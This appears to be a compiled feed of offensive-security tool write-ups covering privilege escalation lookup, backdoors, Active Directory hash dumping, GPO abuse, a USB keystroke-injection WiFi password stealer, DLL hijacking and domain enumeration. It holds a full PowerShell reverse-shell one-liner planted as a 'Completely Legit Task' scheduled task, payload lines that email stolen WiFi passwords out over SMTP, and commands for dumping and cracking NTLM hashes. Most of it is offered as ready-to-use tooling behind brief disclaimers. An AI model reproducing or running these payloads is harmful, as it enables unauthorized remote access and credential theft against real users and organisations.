Gtfocli - GTFO Command Line Interface For Easy Binaries Search Commands That Can Be Used To Bypass Local Security Restrictions In Misconfigured Systems

GTFOcli it's a Command Line Interface for easy binaries search commands that can be used to bypass local security restrictions in misconfigured systems.

Installation

Using go:

go install github.com/cmd-tools/gtfocli@latest

Using homebrew:

brew tap cmd-tools/homebrew-tap
brew install gtfocli

Using docker:

docker pull cmdtoolsowner/gtfocli

Usage

Search for unix binaries

Search for binary tar:

gtfocli search tar

Search for binary tar from stdin:

echo "tar" | gtfocli search

Search for binaries located into file;

cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail

gtfocli search -f myBinaryList.txt

Search for windows binaries

Search for binary Winget.exe:

gtfocli search Winget --os windows

Search for binary Winget from stdin:

echo "Winget" | gtfocli search --os windows

Search for binaries located into file:

cat windowsExecutableList.txt
Winget
c:\\Users\\Desktop\\Ssh
Stordiag
Bash
c:\\Users\\Runonce.exe
Cmdkey
c:\dir\subDir\Users\Certreq.exe

gtfocli search -f windowsExecutableList.txt --os windows

Search for binary Winget and print output in yaml format (see -h for available formats):

gtfocli search Winget -o yaml --os windows

Search using dockerized solution

Examples:

Search for binary Winget and print output in yaml format:

docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows

Search for binary tar and print output in json format:

echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json

Search for binaries located into file mounted as volume in the container:

cat myBinaryList.txt
/bin/bash
/bin/sh
tar
arp
/bin/tail

docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt

CTF

An example of common use case for gtfocli is together with find:

find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null

or

find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search

Credits

Thanks to GTFOBins and LOLBAS, without these projects gtfocli would never have come to light.

Contributing

You want to contribute to this project? Wow, thanks! So please just fork it and send a pull request.

Download Gtfocli

Read More

BackDoorSim - An Educational Into Remote Administration Tools

BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.

Disclaimer

This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.

Features

• File Transfer: Upload and download files between server and client.
• Screenshot Capture: Take screenshots from the client's system.
• System Information Gathering: Retrieve detailed system and security software information.
• Camera Access: Capture images from the client's webcam.
• Notifications: Send and display notifications on the client system.
• Help Menu: Easy access to command information and usage.

Installation

To set up BackdoorSim, you will need to install it on both the server and client machines.

1. Clone the repository:

shell $ git clone https://github.com/HalilDeniz/BackDoorSim.git

1. Navigate to the project directory:

shell $ cd BackDoorSim

1. Install the required dependencies:

shell $ pip install -r requirements.txt

Usage

After starting both the server and client, you can use the following commands in the server's command prompt:

• upload [file_path]: Upload a file to the client.
• download [file_path]: Download a file from the client.
• screenshot: Capture a screenshot from the client.
• sysinfo: Get system information from the client.
• securityinfo: Get security software status from the client.
• camshot: Capture an image from the client's webcam.
• notify [title] [message]: Send a notification to the client.
• help: Display the help menu.

Disclaimer

BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

DepNot: RansomwareSim

If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool

BackdoorSim: An Educational into Remote Administration Tools

If you want to read our article about Backdoor

Contributing

Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:

• LinkedIn : Halil Ibrahim Deniz
• TryHackMe: Halilovic
• Instagram: deniz.halil333
• YouTube : Halil Deniz

Download BackDoorSim

Read More

ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes

This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.

This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.

python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt

    ___    ____  ___________
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
/_/  |_/_____/\____//____/\__, /_/ /_/\___/
                         /____/

Grabbing user certs:
100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00,  1.32s/it]
THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
THEGRID.LO   CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

Introduction

ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

Installation

git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt

Usage

To use this tool we need the following things:

1. Valid Domain Credentials
2. A user list from a bloodhound dump that will be passed in.
3. A template vulnerable to ESC1 (Found with Certipy find)

# python3 adcsync.py --help
    ___    ____  ___________                 
   /   |  / __ \/ ____/ ___/__  ______  _____
  / /| | / / / / /    \__ \/ / / / __ \/ ___/
 / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__  
/_/  |_/_____/\____//____/\__, /_/ /_/\___/  
                         /____/              

Usage: adcsync.py [OPTIONS]

Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound  [required]
  -o, --output TEXT    NTLM Hash Output file  [required]
  -ca TEXT             Certificate Authority  [required]
  -dc-ip TEXT          IP Address of Domain Controller  [required]
  -u, --user TEXT      Username  [required]
  -p, --password TEXT  Password  [required]
  -template TEXT       Template Name vulnerable to ESC1  [required]
  -target-ip TEXT      IP Address of th   e target machine  [required]
  --help               Show this message and exit.

TODO

• Support alternative authentication methods such as NTLM hashes and ccache files
• Automatically run "certipy find" to find and grab templates vulnerable to ESC1
• Add jitter and sleep options to avoid detection
• Add type validation for all variables

Acknowledgements

• puzzlepeaches: Telling me to hurry up and write this
• ly4k: For Certipy
• WazeHell: For the script to set up the vulnerable AD environment used for testing

Download ADCSync

Read More

pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse

Python partial implementation of SharpGPOAbuse by@pkb1s

This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.

Default behavior adds a local administrator.

How to use

Basic usage

Add john user to local administrators group (Password: H4x00r123..)

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"

Advanced usage

Reverse shell example

./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    -powershell \ 
    -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    -taskname "Completely Legit Task" \
    -description "Dis is legit, pliz no delete" \ 
    -user

Credits

• @pkb1s for SharpGPOAbuse
• @airman604 for schtask_now.py
• @SkelSec for msldap

Download pyGPOAbuse

Read More

WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

• Physical access to victim's computer.

• Unlocked victim's computer.

• Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

• Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need

• Raspberry Pi Pico (RPi Pico)
• Micro USB to USB Cable
• Jumper Wire (optional)
• pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
• USB flash drive (for the exploit over physical medium only)

Note:

• It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

• However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

• In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

• Exfiltration over the network medium.

• This approach was used for the Windows exploit. The whole payload can be seen here.

• Exfiltration over a physical medium.

• This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

WiFi-password-stealer/payload/payload_windows.template.dd

Line 31 in 25cf7c5

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

 Note:

• After sending data over the email, the .txt file is deleted.

• You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

• Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

WiFi-password-stealer/payload/payload_linux.template.dd

Line 3 in 25cf7c5

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

WiFi-password-stealer/payload/payload_linux.template.dd

Line 11 in 25cf7c5

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

WiFi-password-stealer/payload/payload_linux.template.dd

Line 7 in a90ffb2

STRING echo PASSWORD | sudo -S echo

WiFi-password-stealer/payload/payload_linux.template.dd

Line 9 in a90ffb2

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

• Manually creating NetworkManager profiles in keyfile format
• Description of keyfile settings plugin

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

WiFi-password-stealer/resources/wifi_pass.txt

Lines 1 to 5 in f5b3b11

	Wireless_Network_Name Password
	--------------------- --------
	WLAN1 pass1
	WLAN2 pass2
	WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

 Tip:

• Upload your payload to RPi Pico before you connect the pins.
• Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

• This pico-ducky currently works only on Windows OS.

• This attack requires physical access to an unlocked device in order to be successfully deployed.

• The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

• Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

• Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

• The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

• Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

• If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

• If the computer has a non-English Environment set, this exploit won't be successful.

• Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

• Fix Caps Lock bug.
• Fix non-English Environment bug.
• Obfuscate the command prompt.
• Implement exfiltration over a physical medium.
• Create a payload for Linux.
• Encode/Encrypt exfiltrated data before sending it over email.
• Implement indicator of successfully completed exploit.
• Implement command history clean-up for Linux exploit.
• Enhance the Linux exploit in order to avoid usage of sudo.

Download WiFi-password-stealer

Read More

KnowsMore - A Swiss Army Knife Tool For Pentesting Microsoft Active Directory (NTLM Hashes, BloodHound, NTDS And DCSync)

KnowsMore officially supports Python 3.8+.

Main features

• Import NTLM Hashes from .ntds output txt file (generated by CrackMapExec or secretsdump.py)
• Import NTLM Hashes from NTDS.dit and SYSTEM
• Import Cracked NTLM hashes from hashcat output file
• Import BloodHound ZIP or JSON file
• BloodHound importer (import JSON to Neo4J without BloodHound UI)
• Analyse the quality of password (length , lower case, upper case, digit, special and latin)
• Analyse similarity of password with company and user name
• Search for users, passwords and hashes
• Export all cracked credentials direct to BloodHound Neo4j Database as 'owned object'
• Other amazing features...

Getting stats

knowsmore --stats

This command will produce several statistics about the passwords like the output bellow

weak passwords by company name similarity +-------+--------------+---------+----------------------+-------+ | top | password | score | company_similarity | qty | |-------+--------------+---------+----------------------+-------| | 1 | company123 | 7024 | 80 | 1111 | | 2 | Company123 | 5209 | 80 | 824 | | 3 | company | 3674 | 100 | 553 | | 4 | Company@10 | 2080 | 80 | 329 | | 5 | company10 | 1722 | 86 | 268 | | 6 | Company@2022 | 1242 | 71 | 202 | | 7 | Company@2024 | 1015 | 71 | 165 | | 8 | Company2022 | 978 | 75 | 157 | | 9 | Company10 | 745 | 86 | 116 | | 10 | Company21 | 707 | 86 | 110 | +-------+--------------+---------+----------------------+-------+ " dir="auto">

KnowsMore v0.1.4 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore
    
 [+] Startup parameters
     command line: knowsmore --stats 
     module: stats
     database file: knowsmore.db
  
 [+] start time 2023-01-11 03:59:20
[?] General Statistics
+-------+----------------+-------+
|   top | description    |   qty |
|-------+----------------+-------|
|     1 | Total Users    | 95369 |
|     2 | Unique Hashes  | 74299 |
|     3 | Cracked Hashes | 23177 |
|     4 | Cracked Users  | 35078 |
+-------+----------------+-------+

 [?] General Top 10 passwords
+-------+-------------+-------+
|   top | password    |   qty |
|-------+-------------+-------|
|     1 | password    |  1111 |
|     2 | 123456      |   824 |
|     3 | 123456789   |   815 |
|     4 | guest       |      553 |
|     5 | qwerty      |   329 |
|     6 | 12345678    |   277 |
|     7 | 111111      |   268 |
|     8 | 12345       |   202 |
|     9 | secret      |   170 |
|    10 | sec4us      |   165 |
+-------+-------------+-------+

 [?] Top 10 weak passwords by company name similarity
+-------+--------------+---------+----------------------+-------+
|   top | password     |   score |   company_similarity |   qty |
|-------+--------------+---------+----------------------+-------|
|     1 | company123   |    7024 |                   80 |  1111 |
|     2 | Company123   |    5209 |                   80 |   824 |
|     3 | company      |    3674 |                  100 |   553 |
|     4 | Company@10   |    2080 |                   80 |   329 |
|     5 | company10    |    1722 |                   86 |   268 |
|     6 | Company@2022 |    1242 |                   71 |   202 |
|     7 | Company@2024 |    1015 |                      71 |   165 |
|     8 | Company2022  |     978 |                   75 |   157 |
|     9 | Company10    |     745 |                   86 |   116 |
|    10 | Company21    |     707 |                   86 |   110 |
+-------+--------------+---------+----------------------+-------+

Installation

Simple

pip3 install --upgrade knowsmore

Note: If you face problem with dependency version Check the Virtual ENV file

Execution Flow

There is no an obligation order to import data, but to get better correlation data we suggest the following execution flow:

1. Create database file
2. Import BloodHound files
   1. Domains
   2. GPOs
   3. OUs
   4. Groups
   5. Computers
   6. Users
3. Import NTDS file
4. Import cracked hashes

Create database file

All data are stored in a SQLite Database

knowsmore --create-db

Importing BloodHound files

We can import all full BloodHound files into KnowsMore, correlate data, and sync it to Neo4J BloodHound Database. So you can use only KnowsMore to import JSON files directly into Neo4j database instead of use extremely slow BloodHound User Interface

# Bloodhound ZIP File
knowsmore --bloodhound --import-data ~/Desktop/client.zip

# Bloodhound JSON File
knowsmore --bloodhound --import-data ~/Desktop/20220912105336_users.json

Note: The KnowsMore is capable to import BloodHound ZIP File and JSON files, but we recommend to use ZIP file, because the KnowsMore will automatically order the files to better data correlation.

Sync data to Neo4j BloodHound database

# Bloodhound ZIP File
knowsmore --bloodhound --sync 10.10.10.10:7687 -d neo4j -u neo4j -p 12345678

Note: The KnowsMore implementation of bloodhount-importer was inpired from Fox-It BloodHound Import implementation. We implemented several changes to save all data in KnowsMore SQLite database and after that do an incremental sync to Neo4J database. With this strategy we have several benefits such as at least 10x faster them original BloodHound User interface.

Importing NTDS file

Option 1

Note: Import hashes and clear-text passwords directly from NTDS.dit and SYSTEM registry

knowsmore --secrets-dump -target LOCAL -ntds ~/Desktop/ntds.dit -system ~/Desktop/SYSTEM

Option 2

Note: First use the secretsdump to extract ntds hashes with the command bellow

secretsdump.py -ntds ntds.dit -system system.reg -hashes lmhash:ntlmhash LOCAL -outputfile ~/Desktop/client_name

After that import

knowsmore --ntlm-hash --import-ntds ~/Desktop/client_name.ntds

Generating a custom wordlist

knowsmore --word-list -o "~/Desktop/Wordlist/my_custom_wordlist.txt" --batch --name company_name

Importing cracked hashes

Cracking hashes

First extract all hashes to a txt file

# Extract NTLM hashes to file
nowsmore --ntlm-hash --export-hashes "~/Desktop/ntlm_hash.txt"

# Or, extract NTLM hashes from NTDS file
cat ~/Desktop/client_name.ntds | cut -d ':' -f4 > ntlm_hashes.txt

In order to crack the hashes, I usually use hashcat with the command bellow

# Wordlist attack
hashcat -m 1000 -a 0 -O -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" "~/Desktop/Wordlist/*"

# Mask attack
hashcat -m 1000 -a 3 -O --increment --increment-min 4 -o "~/Desktop/cracked.txt" --remove "~/Desktop/ntlm_hash.txt" ?a?a?a?a?a?a?a?a

importing hashcat output file

knowsmore --ntlm-hash --company clientCompanyName --import-cracked ~/Desktop/cracked.txt

Note: Change clientCompanyName to name of your company

Wipe sensitive data

As the passwords and his hashes are extremely sensitive data, there is a module to replace the clear text passwords and respective hashes.

Note: This command will keep all generated statistics and imported user data.

knowsmore --wipe

BloodHound Mark as owned

One User

During the assessment you can find (in a several ways) users password, so you can add this to the Knowsmore database

knowsmore --user-pass --username administrator --password Sec4US@2023

# or adding the company name

knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all credentials cracked to Neo4j Bloodhound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

To remote connection make sure that Neo4j database server is accepting remote connection. Change the line bellow at the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687

Download Knowsmore

Read More

Koppeling - Adaptive DLL Hijacking / Dynamic Export Forwarding

This project is a demonstration of advanced DLL hijack techniques. It was released in conjunction with the "Adaptive DLL Hijacking" blog post. I recommend you start there to contextualize this code.

This project is comprised of the following elements:

• Harness.exe: The "victim" application which is vulnerable to hijacking (static/dynamic)
• Functions.dll: The "real" library which exposes valid functionality to the harness
• Theif.dll: The "evil" library which is attempting to gain execution
• NetClone.exe: A C# application which will clone exports from one DLL to another
• PyClone.py: A python 3 script which mimics NetClone functionality

The VS solution itself supports 4 build configurations which map to 4 different methods of proxying functionality. This should provide a nice scalable way of demonstrating more techniques in the future.

• Stc-Forward: Forwards export names during the build process using linker comments
• Dyn-NetClone: Clones the export table from functions.dll onto theif.dll post-build using NetClone
• Dyn-PyClone: Clones the export table from functions.dll onto theif.dll post-build using PyClone
• Dyn-Rebuild: Rebuilds the export table and patches linked import tables post-load to dynamically prepare for function proxying

The goal of each technique is to successfully capture code execution while proxying functionality to the legitimate DLL. Each technique is tested to ensure static and dynamic sink situations are handled. This is by far not every primitive or technique variation. The post above goes into more detail.

Example

Prepare a hijack scenario with an obviously incorrect DLL

> copy C:\windows\system32\whoami.exe .\whoami.exe
        1 file(s) copied.

> copy C:\windows\system32\kernel32.dll .\wkscli.dll
        1 file(s) copied.

Executing in the current configuration should result in an error

> whoami.exe 

"Entry Point Not Found"

Convert kernel32 to proxy functionality for wkscli

> NetClone.exe --target C:\windows\system32\kernel32.dll --reference C:\windows\system32\wkscli.dll --output wkscli.dll
[+] Done.

> whoami.exe
COMPUTER\User

Download Koppeling

Read More

Grok-backdoor - Backdoor With Ngrok Tunnel Support

Grok-backdoor is a simple python based backdoor, it uses Ngrok tunnel for the communication. Ngrok-backdoor can generate windows, linux and mac binaries using Pyinstaller.

Disclaimer:

All the code provided on this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository is solely your responsibility. The misuse of the code in this repository can result in criminal charges brought against the persons in question. Author will not be held responsible in the event any criminal charges be brought against any individuals misusing the code in this repository to break the law.

Dependencies:

• Python 2.7
• Pyinstaller 3.21
• python-pip 9.0.1

Installation :

pip install -r requirements.txt

Usage:
You need to register an acccount in ngrok.com to use this backdoor, provide Ngrok authcode while configuring the grok-backdoor. You will see a new tcp tunnel created in Ngrok status panel after the grok-backdoor server execution in victim machine.
Create backdoor binary by running:

python grok-backdoor.py

Linux:

Windows :

You can find the output binary in grok-backdoor/dist/ directory:

Run grok-backdoor output binary in victim machine and login to Ngrok.com control panel to see the tunnel URL:

Telnet to tunnel URL to get the Bind shell: Enjoy shell :)

Features:

• Multi platform support(windows,linux,Mac)
  
• Autheticated bind shell
  
• Ngrok tunnel for communication

Download Grok-backdoor

Read More

Goddi (Go Dump Domain Info) - Dumps Active Directory Domain Information

Based on work from Scott Sutherland (@_nullbind), Antti Rantasaari, Eric Gruber (@egru), Will Schroeder (@harmj0y), and the PowerView authors.

Install
Use the executables in the releases section. If you want to build it yourself, make sure that your go environment is setup according to the Go setup doc. The goddi package also uses the below package.

go get gopkg.in/ldap.v2

Windows
Tested on Windows 10 and 8.1 (go1.10 windows/amd64).

Linux
Tested on Kali Linux (go1.10 linux/amd64).

• umount, mount, and cifs-utils need to be installed for mapping a share for GetGPP

apt-get update
apt-get install -y mount cifs-utils

• make sure nothing is mounted at /mnt/goddi/
• make sure to run with sudo

Run
When run, will default to using TLS (tls.Client method) over 636. On Linux, make sure to run with sudo.

• username: Target user. Required parameter.
• password: Target user's password. Required parameter.
• domain: Full domain name. Required parameter.
• dc: DC to target. Can be either an IP or full hostname. Required parameter.
• startTLS: Use to StartTLS over 389.
• unsafe: Use for a plaintext connection.

PS C:\Users\Administrator\Desktop> .\godditest-windows-amd64.exe -username=testuser -password="testpass!" -domain="test.local" -dc="dc.test.local" -unsafe
[i] Begin PLAINTEXT LDAP connection to 'dc.test.local'...
[i] PLAINTEXT LDAP connection to 'dc.test.local' successful...
[i] Begin BIND...
[i] BIND with 'testuser' successful...
[i] Begin dump domain info...
[i] Domain Trusts: 1 found
[i] Domain Controllers: 1 found
[i] Users: 12 found
        [*] Warning: keyword 'pass' found!
        [*] Warning: keyword 'fall' found!
[i] Domain Admins: 4 users found
[i] Enterprise Admins: 1 users found
[i] Forest Admins: 0 users found
[i] Locked Users: 0 found
[i] Disabled Users: 2 found
[i] Groups: 45 found
[i] Domain Sites: 1 found
[i] Domain Subnets: 0 found
[i] Domain Computers: 17 found
[i] Deligated Users: 0 found
[i] Users with passwords not set to expire: 6 found
[i] Machine Accounts with passwords older than 45 days: 18 found
[i] Domain OUs: 8 found
[i] Domain Account Policy found
[i] Domain GPOs: 7 found
[i] FSMO Roles: 3 found
[i] SPNs: 122 found
[i] LAPS passwords: 0 found
[i] GPP enumeration starting. This can take a bit...
[i] GPP passwords: 7 found
[i] CSVs written to 'csv' directory in C:\Users\Administrator\Desktop
[i] Execution took 1.4217256s...
[i] Exiting...

Functionality
StartTLS and TLS (tls.Client func) connections supported. Connections over TLS are default. All output goes to CSVs and are created in /csv/ in the current working directory. Dumps:

• Domain users. Also searches Description for keywords and prints to a seperate csv ex. "Password" was found in the domain user description.
• Users in priveleged user groups (DA, EA, FA).
• Users with passwords not set to expire.
• User accounts that have been locked or disabled.
• Machine accounts with passwords older than 45 days.
• Domain Computers.
• Domain Controllers.
• Sites and Subnets.
• SPNs and includes csv flag if domain admin (a flag to note SPNs that are DAs in the SPN CSV output).
• Trusted domain relationships.
• Domain Groups.
• Domain OUs.
• Domain Account Policy.
• Domain deligation users.
• Domain GPOs.
• Domain FSMO roles.
• LAPS passwords.
• GPP passwords. On Windows, defaults to mapping Q. If used, will try another mapping until success R, S, etc... On Linux, /mnt/goddi is used.

Download Goddi

Read More

Know The Dangers Of Credential Reuse Attacks - Cr3dOv3r v0.3

Your best friend in credential reuse attacks.

Cr3dOv3r simply you give it an email then it does two simple jobs (but useful) :

• Search for public leaks for the email and if it any, it returns with all available details about the leak (Using hacked-emails site API).
